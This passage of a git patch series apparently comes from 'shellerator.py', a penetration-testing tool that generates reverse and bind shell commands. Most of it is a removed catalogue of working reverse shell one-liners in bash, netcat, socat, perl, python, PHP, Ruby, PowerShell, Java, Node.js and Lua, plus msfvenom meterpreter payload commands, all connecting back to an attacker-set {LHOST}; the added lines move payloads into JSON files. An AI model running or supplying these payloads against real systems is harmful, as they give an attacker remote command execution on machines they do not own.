add_shell(shells_dict=revshells, type='bash', notes='UDP', shell='''bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1''') - add_shell(shells_dict=revshells, type='bash', notes='UDP Listener (attacker)', shell='''nc -u -lvp {LPORT}''') - add_shell(revshells, 'netcat', '''nc -e /bin/sh {LHOST} {LPORT}''') - add_shell(revshells, 'netcat', '''nc -e /bin/bash {LHOST} {LPORT}''') - add_shell(revshells, 'netcat', '''nc -c bash {LHOST} {LPORT}''') - add_shell(revshells, 'netcat', '''mknod backpipe p && nc {LHOST} {LPORT} 0backpipe ''') - add_shell(revshells, 'netcat', '''rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f''') - add_shell(revshells, 'netcat', '''rm -f /tmp/p; mknod /tmp/p p && nc {LHOST} {LPORT} 0/tmp/p 2>&1''') - add_shell(revshells, 'netcat', '''rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} > f''') - add_shell(revshells, 'netcat', '''rm -f x; mknod x p && nc {LHOST} {LPORT} 0x''') - add_shell(revshells, 'ncat', '''ncat {LHOST} {LPORT} -e /bin/bash''') - add_shell(revshells, 'ncat', '''ncat --udp {LHOST} {LPORT} -e /bin/bash''') - add_shell(revshells, 'telnet', '''rm -f /tmp/p; mknod /tmp/p p && telnet {LHOST} {LPORT} 0/tmp/p 2>&1''') - add_shell(revshells, 'telnet', '''telnet {LHOST} {LPORT} | /bin/bash | telnet {LHOST} 667''') - add_shell(revshells, 'telnet', '''rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {LHOST} {LPORT} > f''') - add_shell(revshells, 'telnet', '''rm -f x; mknod x p && telnet {LHOST} {LPORT} 0x''') - add_shell(revshells, 'socat', '''/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}''') - add_shell(revshells, 'socat', '''socat tcp-connect:{LHOST}:{LPORT} exec:"bash -li",pty,stderr,setsid,sigint,sane''') - add_shell(revshells, 'socat', '''wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{LHOST}:{LPORT}''') - add_shell(shells_dict=revshells, type='socat', notes='Listener (attacker)', shell='''socat file:`tty`,raw,echo=0 TCP-L:{LPORT}''') - add_shell(revshells, 'perl', '''perl -e 'use Socket;$i="{LHOST}";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''') - add_shell(revshells, 'perl', '''perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{LHOST}:{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ''') - add_shell(shells_dict=revshells, type='perl', notes='Windows', shell='''perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"{LHOST}:{LPORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ''') - add_shell(revshells, 'python', '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''') - add_shell(revshells, 'python', '''export RHOST="{LHOST}";export RPORT={LPORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ''') - add_shell(revshells, 'python', '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",{LPORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ''') - add_shell(shells_dict=revshells, type='python', notes='Windows', shell='''C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('{LHOST}', {LPORT})), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"''') - add_shell(revshells, 'php', '''php -r '$sock=fsockopen("{LHOST}",{LPORT});exec("/bin/sh -i <&3 >&3 2>&3");' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});shell_exec("/bin/sh -i <&3 >&3 2>&3");' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});`/bin/sh -i <&3 >&3 2>&3`;' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});system("/bin/sh -i <&3 >&3 2>&3");' ''') - add_shell(revshells, 'php', '''php -r '$s=fsockopen("{LHOST}",{LPORT});popen("/bin/sh -i <&3 >&3 2>&3", "r");' ''') - add_shell(revshells, 'php', '''php -r '$s=\'127.0.0.1\';$p=443;@error_reporting(0);@ini_set("error_log",NULL);@ini_set("log_errors",0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open(\'/bin/sh$IFS-i\',array(array(\'pipe\',\'r\'),array(\'pipe\',\'w\'),array(\'pipe\',\'w\')),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die(\'connection/closed\');if(feof($p[1]))die(\'shell/not/response\');$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die("proc_open/disabled");}}else{die("not/connect");}' ''') - add_shell(revshells, 'ruby', '''ruby -rsocket -e'f=TCPSocket.open("{LHOST}",{LPORT}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''') - add_shell(revshells, 'ruby', '''ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ''') - add_shell(shells_dict=revshells, type='ruby', notes='Windows', shell='''ruby -rsocket -e 'c=TCPSocket.new("{LHOST}","{LPORT}");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ''') - add_shell(revshells, 'openssl', '''mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:{LPORT} > /tmp/s; rm /tmp/s''') - add_shell(shells_dict=revshells, type='openssl', notes='Listener (attacker)', shell='''ncat --ssl -vv -l -p {LPORT}''') - add_shell(revshells, 'powershell', '''powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{LHOST}",{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()''') - add_shell(revshells, 'powershell', '''powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"''') - add_shell(revshells, 'awk', '''awk 'BEGIN {s = "/inet/tcp/0/{LHOST}/{LPORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null''') - add_shell(revshells, 'tclsh', '''echo 'set s [socket {LHOST} {LPORT}];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh''') - add_shell(revshells, 'java', '''r = Runtime.getRuntime() -p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) -p.waitFor()''') - add_shell(revshells, 'java', '''String host="{LPORT}"; -int port={LPORT}; -String cmd="cmd.exe"; -Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();''') - add_shell(shells_dict=revshells, type='java', notes='More stealthy', shell='''Thread thread = new Thread(){public void run(){ //Reverse shell here }}thread.start();''') - add_shell(revshells, 'war', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f war > reverse.war -strings reverse.war | grep jsp # in order to get the name of the file''') - add_shell(shells_dict=revshells, type='lua', notes='Linux', shell='''lua -e "require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');"''') - add_shell(shells_dict=revshells, type='lua', notes='Windows', shell='''lua5.1 -e 'local host, port = "{LHOST}", {LPORT} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ''') - add_shell(revshells, 'nodejs', '''require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')''') - add_shell(revshells, 'nodejs', '''-var x = global.process.mainModule.require --x('child_process').exec('nc {LHOST} {LPORT} -e /bin/bash')''') - add_shell(revshells, 'nodejs', '''(function(){ - var net = require("net"), - cp = require("child_process"), - sh = cp.spawn("/bin/sh", []); - var client = new net.Socket(); - client.connect({LPORT}, "{LHOST}", function(){ - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }); - return /a/; // Prevents the Node.js application form crashing -})();''') - add_shell(revshells, 'groovy', '''String host="{LHOST}"; -int port={LPORT}; -String cmd="cmd.exe"; -Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();''') - add_shell(shells_dict=revshells, type='groovy', notes='More stealthy', shell='''Thread.start { // Reverse shell here }''') - add_shell(revshells, 'meterpreter', '''msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f elf > shell.elf''') - add_shell(revshells, 'meterpreter', '''msfvenom -p windows/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f exe > shell.exe''') - add_shell(revshells, 'meterpreter', '''msfvenom -p osx/x86/shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f macho > shell.macho''') - add_shell(revshells, 'meterpreter', '''msfvenom -p windows/meterpreter/reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f asp > shell.asp''') - add_shell(revshells, 'meterpreter', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.jsp''') - add_shell(revshells, 'meterpreter', '''msfvenom -p java/jsp_shell_reverse_tcp LHOST="{LHOST}" LPORT={LPORT} -f war > shell.war''') - add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_python LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.py''') - add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_bash LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.sh''') - add_shell(revshells, 'meterpreter', '''msfvenom -p cmd/unix/reverse_perl LHOST="{LHOST}" LPORT={LPORT} -f raw > shell.pl''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Windows Staged reverse TCP', shell='''msfvenom -p windows/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Windows Stageless reverse TCP', shell='''msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Linux Staged reverse TCP', shell='''msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf''') - add_shell(shells_dict=revshells, type='meterpreter', notes='Linux Stageless reverse TCP', shell='''msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf''') - - add_shell(bindshells, 'netcat', '''nc -lvp {LPORT} -e /bin/sh''') + shell_str = shell['payload'].replace('{LPORT}', lport).strip() + + if options.QUIET: + return f"{shell_str}" + else: + return f"{Fore.BLUE} {Style.BRIGHT} [{shell['id']}] {Style.RESET_ALL} {shell_str}" + if __name__ == '__main__': - revshells = {} - bindshells = {} - populate_shells() options = get_options() - shells_dict = globals()[options.SHELLTYPE] - print() - for notes, shell in shells_dict[options.TYPE]: - shell_index = shells_dict[options.TYPE].index((notes, shell)) + 1 - if options.LHOST is not None: - print_shell = shell.replace('{LHOST}', options.LHOST).replace('{LPORT}', options.LPORT).strip() + f = open(f"payloads/{options.TYPE}.json") + shells = json.load(f) + + for shell in shells: + if options.ID: + if options.ID == shell['id']: + print(print_shell(shell, options.LPORT, options.LHOST)) else: - print_shell = shell.replace('{LPORT}', options.LPORT).strip() - print_notes = '' - if notes is not None: - print_notes = notes + ' ' - print(Fore.BLUE + Style.BRIGHT + '[' + str(shell_index) + '] ' + print_notes + Style.RESET_ALL + print_shell + '\n') + print(print_shell(shell, options.LPORT, options.LHOST)) + if options.SHELLTYPE == "revshells": cmdline = f'{sys.argv[0]} --reverse-shell --type {options.TYPE} --lhost {options.LHOST} --lport {options.LPORT}' elif options.SHELLTYPE == "bindshells": cmdline = f'{sys.argv[0]} --bind-shell --type {options.TYPE} --lport {options.LPORT}' - print(Fore.RED + Style.BRIGHT + 'CLI command used\n' + Style.RESET_ALL + cmdline + '\n') From 7b52f0a7dab046ac76c23714bdca4442403d87a2 Mon Sep 17 00:00:00 2001 From: lapinou Date: Wed, 17 Apr 2024 01:31:58 +0200 Subject: [PATCH 4/4] Update shellerator.py --- shellerator.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/shellerator.py b/shellerator.py index a066d8c..b7bdf2b 100755 --- a/shellerator.py +++ b/shellerator.py @@ -93,8 +93,8 @@ def get_options(): # typeoptions and portoption are two options either bindshell or revshell will need (https://stackoverflow.com/questions/23775378/allowing-same-option-in-different-argparser-group) typeoption = bindshell.add_argument('-t', '--type', dest='TYPE', type=str.lower, help='Type of the shell to generate (Bash, Powershell, Java...)') portoption = bindshell.add_argument('-lp', '--lport', dest='LPORT', type=str, help='Listener Port') - idoption = bindshell.add_argument('--id', dest='ID', type=str, help='id') - quietoption = bindshell.add_argument('--quiet', dest='QUIET', action='store_true', help='QUIET') + idoption = bindshell.add_argument('--id', dest='ID', type=str, help='Only output the payload with this id') + quietoption = bindshell.add_argument('--quiet', dest='QUIET', action='store_true', help='Only output the final payload(s)') revshell = parser.add_argument_group('Reverse shell options') revshell._group_actions.append(typeoption) revshell.add_argument('-lh', '--lhost', dest='LHOST', type=str, help='Listener IP address')